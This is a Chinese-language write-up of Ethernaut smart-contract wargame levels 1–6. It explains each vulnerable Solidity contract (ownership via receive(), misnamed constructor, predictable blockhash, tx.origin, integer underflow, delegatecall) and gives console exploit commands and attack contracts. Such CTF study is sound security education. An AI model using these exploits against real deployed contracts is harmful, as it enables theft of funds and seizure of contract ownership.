Ethernaut靶场刷题记录(1-6)
author:Thomas_Xu
01 FallBack
这道题是比较简单的,合约的逻辑有问题导致出现漏洞
我们先来了解一下receive和fallback的区别:
receive():
一个合约只能有一个receive函数,该函数不能有参数和返回值,需设置为external,payable;
fallback():
一个合约只能有一个receive函数,该函数不能有参数和返回值,需设置为external;
可设置为payable;
当本合约的其他函数不匹配调用,或调用者未提供任何信息,且没有receive函数,fallback函数被触发;
当本合约收到ether但并未被调用任何函数,未接受任何数据,receive函数被触发;
先看代码:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44pragma solidity ^0.6.0;
import '../SafeMath.sol';
contract Fallback {
  using SafeMath for uint256;
  mapping(address => uint) public contributions;
  address payable public owner;
  constructor() public {
    owner = msg.sender;
    contributions[msg.sender] = 1000 * (1 ether);
  }
  modifier onlyOwner {
        require(
            msg.sender == owner,
            "caller is not the owner"
        );
        _;
    }
  function contribute() public payable {
    require(msg.value < 0.001 ether);
    contributions[msg.sender] += msg.value;
    if(contributions[msg.sender] > contributions[owner]) {
      owner = msg.sender;
    }
  }
  function getContribution() public view returns (uint) {
    return contributions[msg.sender];
  }
  function withdraw() public onlyOwner {
    owner.transfer(address(this).balance);
  }
  receive() external payable {
    require(msg.value > 0 && contributions[msg.sender] > 0);
    owner = msg.sender;
  }
}
题目中给到的SafeMath的地址已经获取不到了,我直接选择找了老版本的SafeMath源码在我本地拉取下来。或者也可以直接用import "@openzeppelin/contracts-ethereum-package/contracts/math/SafeMath.sol";路径代替。
题目想要我们获得合约的所有权,owner再使用withdraw提取出来
- 解题思路 
 阅读完源码发现此合约的- receive函数是有明显漏洞的,我们只需要向此函数转发出一笔转账交易即可将- owner的所有权改为自己- 1 
 2
 3
 4- receive() external payable { 
 require(msg.value > 0 && contributions[msg.sender] > 0);
 owner = msg.sender;
 }- 当然,为了达成 - receive中的require限制条件,我们还需要执行一次- contribute()来将我们的- contributions[msg.sender] > 0
 在获得- owner后,执行- withdraw()即可通关。
- 解题步骤 - 在控制台中调用contract.contribute({value:1)在不带单位的情况下默认单位为wei 
- 可以使用contract.address命令查看合约地址,然后使用metamask给合约地址转一笔账  
- 此时owner应该已经到了,我们来看一下: 
- 执行withdraw()函数进行提款 
- 通关 
 
- 在控制台中调用
02 Fallout
  emmm很白痴的关卡
  先看代码
| 1 | pragma solidity ^0.6.0; | 
  题目要求获得合约的所有权。
  我看了这个合约很久,一直没找到可以攻击的地方……直到我看到了
  1
2
3
4
5/* constructor */
  function Fal1out() public payable {
    owner = msg.sender;
    allocations[owner] = msg.value;
  }
  仔细看这个构造函数的名字,我们会发现Fal1out中间居然有个1关键是他还在上面注释了constructor就很坑。
  那既然它不是个构造函数,并且具有构造函数的功能,那我们直接调用这个错误的“构造函数”就可以获得合约的所有权了。
构造函数最好用
constructor() public {……}的写法
- 解题步骤
- 调用
fal1out函数- 可以看到此时我们已经获得了合约的所有权
- 通关
03 Coin Flip
这是一个和区块结构有关的漏洞,由于用blockhash(block.number.sub(1))的方式计算上一区块的哈希的方式是极容易被攻击利用的。
先看代码:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35pragma solidity ^0.6.0;
import '../SafeMath.sol';
contract CoinFlip {
  using SafeMath for uint256;
  uint256 public consecutiveWins;
  uint256 lastHash;
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
  constructor() public {
    consecutiveWins = 0;
  }
  function flip(bool _guess) public returns (bool) {
    uint256 blockValue = uint256(blockhash(block.number.sub(1)));
    if (lastHash == blockValue) {
      revert();
    }
    lastHash = blockValue;
    uint256 coinFlip = blockValue.div(FACTOR);
    bool side = coinFlip == 1 ? true : false;
    if (side == _guess) {
      consecutiveWins++;
      return true;
    } else {
      consecutiveWins = 0;
      return false;
    }
  }
}
这个合约是一个“掷硬币猜正反”的游戏,要求连续猜对10次极为通关。
先来分析一下合约:block.number可以用来获取当前交易对应block的编号,而这里减1获取的就是前一个block的编号,而blockhash(id)可以获取对应id的block的hash值,然后uint256将其转换为16进制对应的数值。其中给的factor就是2^{256}/2,所以每次做完除法的结果有一半几率是0,一半是1。
这里补充一下几个知识:
- 补充 - Solidity block对象
 block.coinbase (address): 当前块的矿工的地址
 block.difficulty (uint):当前块的难度系数
 block.gaslimit (uint):当前块gas的上限
 block.number (uint):当前块编号
 block.blockhash (function(uint) returns (bytes32)):函数,返回指定块的哈希值,已经被内建函数blockhash所代替
 block.timestamp (uint):当前块的时间戳
 - Revert 
 revert是solidity中的一种错误处理机制,
 而revert一旦触发,会导致当前调用中的所有更改都被还原并将错误数据传递回调用者。
 revert由两种使用形式:- revert :revert CustomError(arg1, arg2);该语句将自定义错误作为不带括号的直接参数
- revert() :revert();revert(“description”);出于向后兼容的原因,还有一个函数,它使用括号并接受字符串
 
- revert :
- Revert与Require与Assert - Assert: 可以理解为严厉一点的判断,如果判断失败,将会burn掉你的gas
- Require: 可以理解为温和一点的判断,就算判断失败,gas会返回给调用者
- Revert :revert的用法和throw很像,也会撤回所有的状态转变。但是它有两点不同:- 它允许你返回一个值
- 它会把所有剩下的gas退回给caller
 
 
 - 详情参见solidity参考文档 
- Solidity block对象
- 漏洞分析: 
 本题的漏洞就出在通过- block.blockhash(block.number - 1)获取负一高度的区块哈希来生成随机数的方式是极易被攻击利用的。- 原理是在区块链中,一个区块包含多个交易,我们可以先运行一下上述除法计算的过程获取结果究竟是0还是1,然后再发送对应的结果过去,区块链中块和快之前的间隔大概有10秒,手动去做会有问题,而且不能保证我们计算的合约是否和题目运算调用在同一个block上,因此需要写一个攻击合约完成调用。我们在攻击合约中调用题目中的合约,可以保证两个交易一定被打包在同一个区块上,因此它们获取的 - block.number.sub(1)是一样的。- 其实就是利用了一个区块中可能由多个交易,而我们可以自己创建一个交易,执行与题目中一样的语句后得到的 - block.number.sub(1)是一样的- 攻击合约代码如下: - 1 
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28- pragma solidity ^0.6.0; 
 import '../SafeMath.sol';
 import './CoinFlip.sol';
 contract Attack {
 using SafeMath for uint256;
 uint256 public consecutiveWins;
 uint256 lastHash;
 uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
 address adr = 0xFd288CbD59B3f74A70B10730a076Ad0b59479C56;//被攻击合约地址
 CoinFlip coin = CoinFlip(adr);
 function dosome() public returns (bool) {
 uint256 blockValue = uint256(blockhash(block.number.sub(1)));
 if (lastHash == blockValue) {
 revert();
 }
 lastHash = blockValue;
 uint256 coinFlip = blockValue.div(FACTOR);
 bool side = coinFlip == 1 ? true : false;
 coin.flip(side);
 }
 
 }- 部署成功后只需要执行10次 - dosome方法即可- 我试过编写一个函数用一个for循环来控制 - dosome()执行的次数,最终以失败告终,应该是由于循环多了之后造成gas超过了gaslimit的上限。
 解题步骤:
- 将我们的攻击合约部署在测试链上
- 执行10次dosome()函数
- 通关 
04 Telephone
此题考查tx.origin和msg.sender的区别。没有什么难点
先看代码1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16pragma solidity ^0.6.0;
contract Telephone {
  address public owner;
  constructor() public {
    owner = msg.sender;
  }
  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}
题目要求获得合约所有权,可以看到只要满足tx.origin != msg.sender就行。在此介绍一下tx.origin:
tx.origin是Solidity的一个全局变量,它遍历整个调用栈并返回最初发送调用(或事务)的帐户的地址。
在智能合约中使用此变量进行身份验证会使合约容易受到类似网络钓鱼的攻击。
因为tx.origin是交易的原始发起者,而我们可以通过很多方式使得tx.origin作为智能合约的授权变得不可靠。
举个例子:假设A、B、C都是已经部署的合约,如果我们用A去调用C,即A->C,那么在C合约看来,A既是tx.origin,又是msg.sender。如果调用链是A->B->C,那么对于合约C来说,A是tx.origin,B是msg.sender,即msg.sender是直接调用的一方,而tx.origin是交易的原始发起者
- 漏洞分析 
 在此题中,我们只需要写一个攻击合约,使攻击合约通过另一个地址去调用受攻击合约就行:- 1 
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15- pragma solidity ^0.6.0; 
 interface Telephone {
 function changeOwner(address _owner) external;
 }
 contract Attack {
 Telephone t;
 constructor(address _adr) public{
 t = Telephone(_adr);
 }
 function exp () public {
 t.changeOwner(0x100200fF289D4dA0634fF36d7f5D96524f7EFf67);
 }
 }- 总结:
 tx.origin不应该用于智能合约的授权。更多的时候采用msg.sender == owner来进行判断。
 但它也有自己使用的场景,比如想要拒绝外部合约调用当前合约则可使用require(tx.origin ==msg.sender)来进行实现。
 - 05 Token- 这是一个整数溢出的漏洞 
 先看代码:- 1 
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22- pragma solidity ^0.6.0; 
 contract Token {
 mapping(address => uint) balances;
 uint public totalSupply;
 constructor(uint _initialSupply) public {
 balances[msg.sender] = totalSupply = _initialSupply;
 }
 function transfer(address _to, uint _value) public returns (bool) {
 require(balances[msg.sender] - _value >= 0);
 balances[msg.sender] -= _value;
 balances[_to] += _value;
 return true;
 }
 function balanceOf(address _owner) public view returns (uint balance) {
 return balances[_owner];
 }
 }- 不难发现,这个合约没有用到 - SafeMath那么我们就要格外关注是否存在整数溢出型的漏洞。
 不出意外:在transfer方法中- require(balances[msg.sender] - _value >= 0)使明显存在整数下溢的风险的。
 由于题目中说到我们一开始拥有20个token,那我们只需要向此合约发出交易,- _value>20即可使- balances[msg.sender] - _value发生下溢变成一个很大的值从而符合判定条件。- 解题思路
 - 在控制台调用transfer方法value为21即可 
- 此时查看我们的账户余额已经是一个相当大的值 
- 通关
 
- 总结:
06 Delegation
这道题考查对delegatecall()的认识
非常危险
先看代码:
| 1 | pragma solidity ^0.6.0; | 
本题目的是要拿到合约的所有权,阅读代码后,其实就是想要通过Delegation合约调用Delegate中的pwn()函数,即可完成对owner的修改
- 漏洞分析
 我们注意到Delegation中的fallback()函数有address(delegate).delegatecall(msg.data);出现,而关于delegatecall的有关介绍可以参考我的另一篇博文,我们可以知道delegatecall函数是非常危险的,而且历史上已经多次被用于进行 attack vector. 使用它。
 我们在这道题当中只需要给Delegation合约转账,触发他的fallback函数并通过函数签名的方式传入data即可
解题步骤:
- 执行contract.sendTransaction({data:web3.utils.keccak256("pwn()").slice(0,10)});给当前合约赚一笔帐并指定data 
- 通关
 
                    true

...
...



This is copyright.